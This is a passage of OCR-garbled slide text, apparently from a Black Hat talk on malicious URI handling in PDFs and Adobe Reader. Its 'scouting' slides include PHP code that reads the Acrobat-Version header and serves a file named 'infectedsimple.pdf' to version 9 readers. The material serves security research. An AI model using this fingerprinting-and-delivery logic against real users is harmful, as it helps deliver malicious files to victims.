Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 62: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/62.jpg)
Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 63: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/63.jpg)
Scou6ng Adobe Reader (1/4)
Ø Request Performed:
![Page 64: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/64.jpg)
Scou6ng Adobe Reader (2/4)
Server-‐side processing in PHP: Ø Read the header $headers = apache_request_headers(); Ø Check for Acrobat-‐Version informa-on in the header foreach ($headers as $header => $value) {
if($header == "Acrobat-‐Version"){ … }
} Ø For a version number, launch the malicious PDF related if(preg_match("#9#",$value)){ // if Adobe version == 9.X
header('Content-‐type: applicaHon/pdf'); header('Content-‐DisposiHon: ahachment; filename="infectedsimple.pdf"'); readfile('infectedsimple.pdf');
}
![Page 65: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/65.jpg)
Scou6ng Adobe Reader (3/4)
![Page 66: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/66.jpg)
![Page 67: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/67.jpg)
Scou6ng Adobe Reader (4/4)
In this scenario: we don’t need javascript
to know the Adobe Version !!!
![Page 68: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/68.jpg)
Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 69: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/69.jpg)
Conclusion
Ø /OpenAc6on s6ll works.
Ø Try new methods to an6cipate future threats.
Ø Weak URL Detec6on.
![Page 70: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/70.jpg)
Future Works Ø Compare the security of different PDF Readers. Ø Analyze what is the security of PDFs on Smartphones. Ø Explore other Opera6ng systems (Linux, Mac OSX).
![Page 71: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/71.jpg)
Ø Introduc6on Ø Network security in Adobe Reader
Ø URI Method Ø Submit Form Method Ø Adobe URL Filter
Ø Weaknesses of Adobe’s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons
![Page 72: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/72.jpg)
Thank you for your ahenHon. Any quesHons??? ValenHn HAMON valen&[email protected]‐ouest.fr